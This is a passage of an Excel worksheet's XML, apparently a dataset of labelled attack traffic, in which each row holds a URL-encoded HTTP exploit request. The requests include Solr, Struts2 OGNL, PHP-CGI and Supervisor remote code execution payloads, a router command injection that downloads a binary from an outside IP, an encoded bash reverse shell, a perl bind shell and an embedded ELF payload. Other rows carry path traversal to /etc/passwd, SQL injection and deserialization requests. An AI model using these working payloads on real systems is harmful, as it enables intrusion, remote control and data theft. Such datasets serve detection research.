        <v>POST%20%2Fsolr%2Fdemo%2Fconfig%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F52.0.2762.73%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20158%0AAccept-Encoding%3A%20identity%0A%0A%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22newlistener%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%20%22touch%20%2Ftmp%2Fsuccess%22%5D%7D%7D</v>
      </c>
    </row>
    <row r="98" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A98" s="2" t="s">
        <v>74</v>
      </c>
      <c r="B98" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C98" t="s">
        <v>202</v>
      </c>
      <c r="D98" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fbeescms%2Fadmin%2Fadmin_book.php%3Faction%3Ddel%26lang%3Dcn%26id%3D1%2A%26nav%3Dmain%26admin_p_nav%3Dmain_info%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2049.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="99" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A99" s="2" t="s">
        <v>73</v>
      </c>
      <c r="B99" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C99" t="s">
        <v>203</v>
      </c>
      <c r="D99" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2FdoUpload.action%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_8_4%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F49.0.2656.18%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20%25%7B%28%23_%3D%27multipart%2Fform-data%27%29.%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23data%3D%40org.apache.struts2.ServletActionContext%40getRequest%28%29.getHeader%28%27X-tGwE%27%29%29.%28%23f%3D%40java.io.File%40createTempFile%28%27iosN%27%2C%27.exe%27%29%29.%28%23f.setExecutable%28true%29%29.%28%23f.deleteOnExit%28%29%29.%28%23fos%3Dnew%20java.io.FileOutputStream%28%23f%29%29.%28%23d%3Dnew%20sun.misc.BASE64Decoder%28%29.decodeBuffer%28%23data%29%29.%28%23fos.write%28%23d%29%29.%28%23fos.close%28%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%7B%23f.getAbsolutePath%28%29%7D%29%29.%28%23p.start%28%29%29.%28%23f.delete%28%29%29%7D%0AX-Tgwe%3A%20f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA%2BgAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH%2FaglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCo%2BIRRSInmahBaaipYDwVZSIXAeSVJ%2F8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp%2BWg8FSIXAeO3%2F5g%3D%3D%0A</v>
      </c>
    </row>
    <row r="100" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A100" s="2" t="s">
        <v>72</v>
      </c>
      <c r="B100" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C100" t="s">
        <v>204</v>
      </c>
      <c r="D100" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fpublic%2Findex.php%3Fs%3D%2Findex%2Fqrcode%2Fdownload%2Furl%2FL2V0Yy9wYXNzd2Q%3D%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1944.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="101" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A101" s="2" t="s">
        <v>71</v>
      </c>
      <c r="B101" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C101" t="s">
        <v>205</v>
      </c>
      <c r="D101" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fboaform%2Fadmin%2FformPing%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_10_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2227.1%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%2075%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%3B%20charset%3DUTF-8%0APragma%3A%20no-cache%0AX-Requested-With%3A%20XMLHttpRequest%0A%0Atarget_addr%3D%3Bcd%20%2Ftmp%3B%20rm%20-rf%3B%20wget%20http%3A%2F%2F51.254.23.227%2Fbins%2Fn%3Bchmod%20777%20n%3B</v>
      </c>
    </row>
    <row r="102" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A102" s="2" t="s">
        <v>70</v>
      </c>
      <c r="B102" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C102" t="s">
        <v>206</v>
      </c>
      <c r="D102" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fservice%2Fextdirect%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_10_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2062.124%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20223%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0ANx-Anti-Csrf-Token%3A%200.3355471197376484%0AX-Nexus-Ui%3A%20true%0AX-Requested-With%3A%20XMLHttpRequest%0A%0A%7B%22action%22%3A%22coreui_User%22%2C%22method%22%3A%22update%22%2C%22data%22%3A%5B%7B%22userId%22%3A%22admin%22%2C%22version%22%3A%222%22%2C%22firstName%22%3A%22admin%22%2C%22lastName%22%3A%22User%22%2C%22email%22%3A%22admin%40example.org%22%2C%22status%22%3A%22active%22%2C%22roles%22%3A%5B%22nxadmin%24%5C%5CB%7B233%2A233%7D%22%5D%7D%5D%2C%22type%22%3A%22rpc%22%2C%22tid%22%3A11%7D</v>
      </c>
    </row>
    <row r="103" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A103" s="2" t="s">
        <v>69</v>
      </c>
      <c r="B103" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C103" t="s">
        <v>207</v>
      </c>
      <c r="D103" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Ftaocms-3.0.2%2Fadmin%2Fadmin.php%3Faction%3Dfile%26ctrl%3Ddel%26path%3Ddata%2Finstall.lock%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F70.0.3538.77%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="104" spans="1:4" ht="23.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A104" s="2" t="s">
        <v>68</v>
      </c>
      <c r="B104" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C104" t="s">
        <v>208</v>
      </c>
      <c r="D104" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fvulnerabilities%2Fsqli_blind%2F%3Fid%3D1%2529%253BCALL%2520REGEXP_SUBSTRING%2528REPEAT%2528RIGHT%2528CHAR%25285158%2529%252C0%2529%252C500000000%2529%252CNULL%2529--%26Submit%3DSubmit%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F89.0.4389.114%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="105" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A105" s="2" t="s">
        <v>67</v>
      </c>
      <c r="B105" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C105" t="s">
        <v>209</v>
      </c>
      <c r="D105" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2F%2525u0073%2525u0071%2525u004c%2525u0053%2525u0065%2525u0072%2525u0076%2525u0065%2525u0072%2F%2525u0053%2525u0065%2525u0041%2525u0072%2525u0063%2525u0048%2F%2525u0073%2525u0045%2525u0061%2525u0072%2525u0063%2525u0068.%2525u0041%2525u0073%2525u0050%3F%25u006e%25u0061%25u006d%25u0065%3D%25u0031%25u0027%2B%25u0075%25u004e%25u0069%25u006f%25u004e%2B%25u0053%25u0065%25u006c%25u0045%25u0063%25u0054%2B%25u0031%25u002c%25u0032%25u002c%25u0033%2B%25u002d%25u002d%2B%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1944.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="106" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A106" s="2" t="s">
        <v>66</v>
      </c>
      <c r="B106" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C106" t="s">
        <v>210</v>
      </c>
      <c r="D106" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fmobile%2FDBconfigReader.jsp%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2228.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="107" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A107" s="2" t="s">
        <v>65</v>
      </c>
      <c r="B107" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C107" t="s">
        <v>211</v>
      </c>
      <c r="D107" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fvulnerabilities%2Fsqli_blind%2F%3Fid%3D1%2529%253BCALL%2520REGEXP_SUBSTRING%2528REPEAT%2528LEFT%2528CRYPT_KEY%2528CHAR%252865%2529%257C%257CCHAR%252869%2529%257C%257CCHAR%252883%2529%252CNULL%2529%252C0%2529%252C500000000%2529%252CNULL%2529--%26Submit%3DSubmit%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.4%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="108" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A108" s="2" t="s">
        <v>64</v>
      </c>
      <c r="B108" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C108" t="s">
        <v>212</v>
      </c>
      <c r="D108" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2Fjsrpc.php%3Foutput%3Djson-rpc%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_10_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2062.124%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20112%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson-rpc%0AX-Prototype-Version%3A%201.6.1%0AX-Requested-With%3A%20XMLHttpRequest%0A%0A%7B%22jsonrpc%22%3A%20%222.0%22%2C%20%22method%22%3A%20%22zabbix.status%22%2C%20%22params%22%3A%20%7B%7D%2C%20%22auth%22%3A%20%228ab3489dcced2ac4573fee2fdedc58c0%22%2C%20%22id%22%3A%203%7D</v>
      </c>
    </row>
    <row r="109" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A109" s="2" t="s">
        <v>63</v>
      </c>
      <c r="B109" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C109" t="s">
        <v>213</v>
      </c>
      <c r="D109" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2F%3Fid%3D2%3BSELECT%25201%2520AS%2520%2522%5C%2527%5D%253D0%253Brequire%253Dprocess.mainModule.constructor._load%253B%252F%2A%2522%252C%25202%2520AS%2520%2522%2A%252Fp%253Drequire%28%60child_process%60%29%253B%252F%2A%2522%252C%25203%2520AS%2520%2522%2A%252Fp.exec%28%60echo%2520YmFzaCAtaSA%252BJiAvZGV2L3Rj%60%252B%252F%2A%2522%252C%25204%2520AS%2520%2522%2A%252F%60cC8xOTIuMTY4Ljc1LjE1MC85OTk5IDA%252BJjE%253D%7Cbase64%2520-d%7Cbash%60%29%252F%252F%2522%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="110" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A110" s="2" t="s">
        <v>62</v>
      </c>
      <c r="B110" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C110" t="s">
        <v>214</v>
      </c>
      <c r="D110" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2Fcgi-bin%2FdownloadFlile.cgi%3Fpayload%3D%60ls%3E..%2F1.txt%60%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2228.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="111" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A111" s="2" t="s">
        <v>61</v>
      </c>
      <c r="B111" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C111" t="s">
        <v>215</v>
      </c>
      <c r="D111" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_10_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2062.124%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0ACookie%3A%20rememberMe%3DRgtquPWTQGqaLJPC27IPfmLvDLnyhfydqBvaPKs8kHl%2B9ZHnPiOMFwR6Ar%2BK5CFtm4CwgWhvHD06NyyURNYUF0mmwn8%2Bb4f9Dnvy4yJCsEMH9f2m2L46HavOW0JFyVzcLml7vnImITQ1aSgHA1ggLCYnL%2F%2B1VumdVcUT1Ae%2BlNVqCgM%2FaY4lgSwI63JLsrIkQOixad7K5E%2BSXVwFljzEe3b2SdQSuBrzzCOWUG6dbK45nCmGkpT1eUxyDgXT8ZF2S%2BIEJf%2BsLNuO%2BC673Hx9IYVnWZ5%2FaSYDnHK6%2FK6Q%2BuEpBEfUHxtgbaAiJ4coW1Cf%2FUQeZNboSYZcZ1fQDVC7CHxsT9nn5gr6L8wD3ifNyAEIcP4bksqx3WPBDN1dyk3kr2TFTvFWGM2LxF6f7wb1woW3cM5DvYX9h2PizjCPrA1DR4YFi%2F5RaKA%2FxJxGisC0QWx1Jt0EOh2EvQT4THnHIizzYp4puylksurafr6qo9%2BAv9RH3WLBsUtwOTADN4EzKsyh88ixsIK9Gv8GLyBI5HaxSjNz%2F107Ux061ZhrAlzknleHnQOEYNttop4UjkLTU5f9J3h1xiCRhFTIkxZ5flBo%2FbfrrStvOxUOwmMTR%2FJpm7O%2Fxaslkt5nrXEc97idSf%2BaGmlWPiitzJLxATNhC1Tu6ANMK4Esm3Ywzeu%2FazOBUBHjIDmuBAlZwFd6XdsEHZkRkgNsuET5JAgFdQZyOpAK39xXISyHDYnlX0LHEV29VeQ%2B91PNccebvdZSfFWuQUrra4a%2Bi1EmViOhvo%2BK3kAOAfSS8uWwvksM6M%2Ff3X8AfJubsDSZa9AqXv8XRIB1UMX%2F92Gw8l%2Fne7%2ByyiAdQy7CFTzbt6RtW1gmjNSNACm%2F36oD%2Fayj2rzXBQ4htWbxQINeJSVSaJBzBV80AU2zg6N0sWCbuEooDbH5amJeYIX0UG8DOJKUDWN%2FywlGq5%2BxYBYWxczuWmpuhBWtbB5bc0NslaekLF0c8rJK9tl8acn3QeaVOia%2B%2FVr0DUSKMTNiCtiCZiZn6Wul9U4GHJMOooDkY3DdP0v%2B2sUbEYlBJ%2BxSpjPWSXxhD6kgvphEKxFNuz0cx0DpbgPxMQyhXnwxbi%2BRKTQqJ6x0FZj1Snzv9xqEIl1Lzjei%2BD3PrwyaLppmQ08g7cCxTDwpuQwGmRDeD5FWeU47B9I0lIHZYhGtZoVZnmbdewd2YjtQFe6Nyjz2TTq7dqoWhyBpnnqz7%2FFcGBGqsFK%2FX8z2494%2Bvt2rsTR26DTdGw7RkfvS3g%2FpvVMFi2QzazdLlv50nqsXoDKdbqhLdrrrhqEUw75x4c8Dw4cWd%2FxhUzBtY7O72VV5y1cFYyUbD29F6wcqTfbalxbmbjzYmC7kY%2BFvgHZlhGgWnEQSPivF3RjdfwojAOmTjQA5R2KjkwM27%2F7ulgNlFG%2BcPI0uzD%2FKoM%2F9sKn1RoXQnuC5mcIHuv75xAzxRCqnSOB5L2qMTjE3J8h7zectATD4gOQTJsDJkIUlvzP9QCRpyiRRFhLiRGWKtqsxW%2BBfgjRPsReKKmAbk9YC2gRxE6sRFCukuQMFrbk0Nd%2BIwjE9p0gDSIS3GyO2oQ4h3ZZ798wUYX7AsXGQ%2BS7v1DoG4upho5951MGcxfT%2B8x9PA7zHAQP%2Bh46UYBc17FiExpnSuHAPHTMpzdbJWaiuRYWJYatSbw7mcTV7RQVgtveFHh%2BVtXhJfURj5BGB1mZcmP0HmHOhgRZo8eS9J9oHUODEfrvRXqZIbjNQ0HwkU9xkInIdNVnYxOWjkFZQve4xiWKB5HHH%2Bj5uPP2ANBbXwbHhlLaIkG07uBFfjNLiqUR185Qt7Ib0TtQUxV9Z3oUV8qmRftrKVN%2BV38K64tgKm1O7oqCc1pnMHNLa99BVqWk5hGb5L8TxlcDrirsaLb0SNGTZJpbzleQSLnqxoCJ8tFmZDRxvLIoYFxvx1FvMix1%2FfJVPVibRrr9syUa%2FJxfztxFj%2BDWCD3YfvkTveLouyjAxmIPXsLJ6dh4M5EYmK%2BhslWMO2BEgcHTJlpySbHE4fq9bEb66QS0fe12ufSkoee7dFC1BOEmMTcOccZWtEPLPB370sAQp1GEfic7%2Fz4v8D3k3VXdTKtqnj0TYfSNOQdklZUM3WYTLbhc1jU3%2BRckTmpGMl5box6cu3VotrLBpdj5R9WK7Igkq3HQClmCvwgpB79Ujv2tCfySQGS35hMZlxVk87S4lqfbhwDsho%2BwSV2Zok5XqRa8aqaYhVamrbKNaXmyng1r2wqV%2F2Lc8YjbLh5bPz%2FwF9s6hcDOtyrnEluUxu6gX9QVa7QC0kj570UXBtAWGSm6pvU4CfeGCiRXIBcdARD1AEA2jIZ1ANfgbdg%2BIWmQwrH5IcWePpBAm6jwCUFfdsUBSuokSQ6XyYdHF9Z%2B5VSdwPeSL3IvAOtHHNFhJdGHggfa1ocNtpui6Teuu2TlySFUmrtsUNbBPa487Xehi1GqWPk7J%2BdwuUPe1gP5B8h%2F1%2FcEhWaPESGdfHXvHeZXopITOHfflIlArh3M6%2FR938h%2FQc%2BlVUqBowgzDFaOlubV4%2BqW0%2FR1GJveNUnknnrfBACADjFLzRH8D1PZ1vDTdY%2FjpppRrNNVfgDB%2FeQaP%2BvWGzBmoribXokDeKCXoJfbTfavhjllPZkX452PQQMAcEq9ucvx%2F3Z0%2FEkestcdokNuk4fEtEOMg5e9BzxKVN%2Baz362uob9hMinpbpV2NjbgA%2F1EFUMgxPkuCW7KJCAsbt6lptp3cSjMv65kZP3ilnGXsYtqyL1MCU1RKxrclI%2FwA5%2BqiTCxu1pcGysZJsZj5TXx1yzrSgHku%2BFIwPsNRgrkeytt6fbWOSe9JQ6ns%2FP%2BJNS7uItyV4perpIT5FKO28yfxXMVL8WTVrA5XKJJXVcdR5d9iwIVZM2%2BPXDAxjNuejMT0a7ftAejlqOYbHn5m9NAzMWZFRa5ASlUuS4cEHQ8VKc6xgKCZY1NiyMFilhtg3P0gRKpGvLo%2FYWB1NNmJuPB6Ynd2wZ3%2FF%2FoN2g09BVD6srQ%2Fl8CmSW9dc24fjjYb%2BelDSnFcUUKT6At%2BTyjBT%2B8h8rc6nFVWQmafHeHa7WUSXN8hE3X0PYKp8d4yHa4Ap5AxePTzOzQcntliLiqQCIxHWBcPcdc3MDhtGELqcoURCnEK7rc%2BVBubLeQP%2B%2FX%2BIiaXDhytm9p%2FKalYhvxOHGZD9dip3D9NMNmhdaU%2BYnR1TxmrM1%2BGrF6Z8KYSwFroz%2BUZ5z%2Bwm%2FBiJbVNgROOxFtS%2B8nZujKzP5nF3eUNE9MYp0K6WHwDqFgAw%2Bw0kDyI%2FmNJ9stT3%2F1eeyyltdhWikwPpDeMFJS09KtSLVbKe427lUvRpiWdXxz3Mx%2BF4BMHl9lMfKOjj2Wv8IzanqfaisH%2Bug0MCrmw%2BpitBT15DnDSuRAZyE9iWZKWsNy8YgRB%2FmhtAzpzpTQvCFI4RJY%2BYefC0NsXxBwjlwqhfsaCgFqbmeWaDq3A7yPrJzmlXEzbaFWPcjXBSsCId1tuRuldHtBrVUMijk%2FNfB8iz%2FvVwItSHZoIO2Ikuffu1qV3GqhdRrTkwGQ%2BOJG057eBKzU9c26injpQVyqiQ%2BIlyQ0YzWSAQEnAx3wn1pIkavOU50q%2FEepE78ogpqxqxhYKdd4Hg0ijeDm3SdSCNb2wMqYhZoyD53M5SWqqsKhK5cJ5dXBwtjNxQ2BEt9fEDBUuIz6h%2BmEruj3evZW9Gg1PJoEaEA8EF8asMsdE0WC%2BgiyUctkFswgw9rd2u5i%2B4QnKcB7BcmjyJsQxLBIAWdSxoWN97gjyj9AyS82jiyJrC8CFt7%2BIpTK8bIoPTY6DNcfDKitk98PiyGRyxv70jws1%2FL7RfEY0RIgXZlx2WEP0cz4gOdkYV2Mz2pHwKO6URgNbp2NURMZn594zYaAQRMPWS1I%2B%2FxKKBoQzNkGkybXUflWWOAgAQ%2FA0sRU6dbocZUXby3TkD73%2FykY%2BoH%2FkD4A8PP2WBpfhyc7Trwn0T8sO9c1kEfHvASL5c5qDXJmkpHjMaVqAflOK7crmPP09TFuxk749TEcMGWJr1uTPcbHCwAucKGDScVlev6fCMKqSaN4MFp1T214HMOO1c33M2UYxu80aX6oagd53joh13tSS1EXDtB0qv4av43f3%2FAC9cjYVP6tKXGO6q3FllqmBTQwtKdYS2lmwtJQ%2BAp6v721w16f7MWk4wM%3D%0A</v>
      </c>
    </row>
    <row r="112" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A112" s="2" t="s">
        <v>60</v>
      </c>
      <c r="B112" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C112" t="s">
        <v>216</v>
      </c>
      <c r="D112" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2F%3F-%2564%2Ballow_url_include%253dTrue%2B--define%2Bsafe_mode%253dfaLse%2B-%2564%2Bsuhosin.simulation%253don%2B--define%2Bdisable_functions%253d%2522%2522%2B-d%2Bopen_basedir%253dnone%2B-%2564%2Bauto_prepend_file%253dphp%3A%2F%2Finput%2B--define%2Bcgi.force_redirect%253dOFf%2B--define%2Bcgi.redirect_status_env%253d0%2B--no-php-ini%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2228.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20236%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0A%0A%3C%3Fphp%20system%28base64_decode%28%27cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0NDQ0LFJldXNlLDEsTGlzdGVuKS0%2BYWNjZXB0OyR%2BLT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTtzeXN0ZW0kXyB3aGlsZTw%2BJw%3D%3D%27%29%29%3B</v>
      </c>
    </row>
    <row r="113" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A113" s="2" t="s">
        <v>59</v>
      </c>
      <c r="B113" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C113" t="s">
        <v>147</v>
      </c>
      <c r="D113" t="str">
        <f t="shared" si="1"/>
        <v>GET%20%2F..%252f..%252f..%252f..%252f..%252fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Ubuntu%3B%20Linux%20i686%20on%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F53.0.2820.59%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="114" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A114" s="2" t="s">
        <v>58</v>
      </c>
      <c r="B114" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C114" t="s">
        <v>217</v>
      </c>
      <c r="D114" t="str">
        <f t="shared" si="1"/>
        <v>POST%20%2FRPC2%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F89.0.4389.114%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20303%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20text%2Fxml%0A%0A%3C%3Fxml%20version%3D%221.0%22%3F%3E%0A%3CmethodCall%3E%0A%20%20%3CmethodName%3Esupervisor.supervisord.options.warnings.linecache.os.system%3C%2FmethodName%3E%0A%20%20%3Cparams%3E%0A%20%20%20%20%3Cparam%3E%0A%20%20%20%20%20%20%3Cstring%3Eecho%20-n%20cm0gLWYgJy90bXAvV0VHYXAuYjY0Jw%3D%3D%7Cbase64%20-d%7Cnohup%20bash%20%3E%20%2Fdev%2Fnull%202%3E%26amp%3B1%20%26amp%3B%3C%2Fstring%3E%0A%20%20%20%20%3C%2Fparam%3E%0A%20%20%3C%2Fparams%3E%0A%3C%2FmethodCall%3E</v>
      </c>
    </row>
    <row r="115" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A115" s="2" t="s">
        <v>57</v>
      </c>
      <c r="B115" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C115" t="s">
        <v>218</v>
      </c>
      <c r="D115" t="str">
        <f t="shared" si="1"/>
